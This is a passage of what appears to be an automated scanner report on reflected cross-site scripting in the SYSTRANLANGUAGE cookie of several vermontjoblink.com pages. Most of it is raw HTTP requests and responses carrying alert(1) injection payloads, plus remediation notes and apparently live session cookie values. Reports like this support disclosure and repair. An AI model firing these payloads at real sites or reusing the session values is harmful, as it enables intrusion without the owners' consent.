User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=ened9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ened9d5"><img src=a onerror=alert(1)>d473d92771b">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceb4"%3balert(1)//60cf3b24c05 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as bceb4";alert(1)//60cf3b24c05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=enbceb4"%3balert(1)//60cf3b24c05; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:26 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENBCEB4";ALERT(1)//60CF3B24C05\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b71b2"><img src=a onerror=alert(1)>aa3836d3e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enb71b2"><img src=a onerror=alert(1)>aa3836d3e47">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93c3c"%3balert(1)//c80ab57b023 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 93c3c";alert(1)//c80ab57b023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to break out of the double-quoted JavaScript string and so inject arbitrary JavaScript into the application's response. As with the other script-context reflections on this host, the echoed value is upper-cased (ALERT(1)), so the payload exactly as submitted would not execute; re-verify the finding with a payload that remains valid after upper-casing before treating it as exploitable.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en93c3c"%3balert(1)//c80ab57b023; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN93C3C";ALERT(1)//C80AB57B023\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e535"><img src=a onerror=alert(1)>881020bcf9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2e535"><img src=a onerror=alert(1)>881020bcf9f">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload affbc"%3balert(1)//53c2f941734 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as affbc";alert(1)//53c2f941734 in the application's response.
This proof-of-concept attack demonstrates that it is possible to break out of the double-quoted JavaScript string and so inject arbitrary JavaScript into the application's response. As with the other script-context reflections on this host, the echoed value is upper-cased (ALERT(1)), so the payload exactly as submitted would not execute; re-verify the finding with a payload that remains valid after upper-casing before treating it as exploitable.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enaffbc"%3balert(1)//53c2f941734; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENAFFBC";ALERT(1)//53C2F941734\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as f9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enf9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:20:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enf9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2b8"%3balert(1)//fa1bc80a5c3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9e2b8";alert(1)//fa1bc80a5c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to break out of the double-quoted JavaScript string and so inject arbitrary JavaScript into the application's response. As with the other script-context reflections on this host, the echoed value is upper-cased (ALERT(1)), so the payload exactly as submitted would not execute; re-verify the finding with a payload that remains valid after upper-casing before treating it as exploitable.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en9e2b8"%3balert(1)//fa1bc80a5c3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:20:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9E2B8";ALERT(1)//FA1BC80A5C3\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as decca"><img src=a onerror=alert(1)>0dfd472147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=endecca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:59 GMT
Server: Microsoft-IIS/6.0
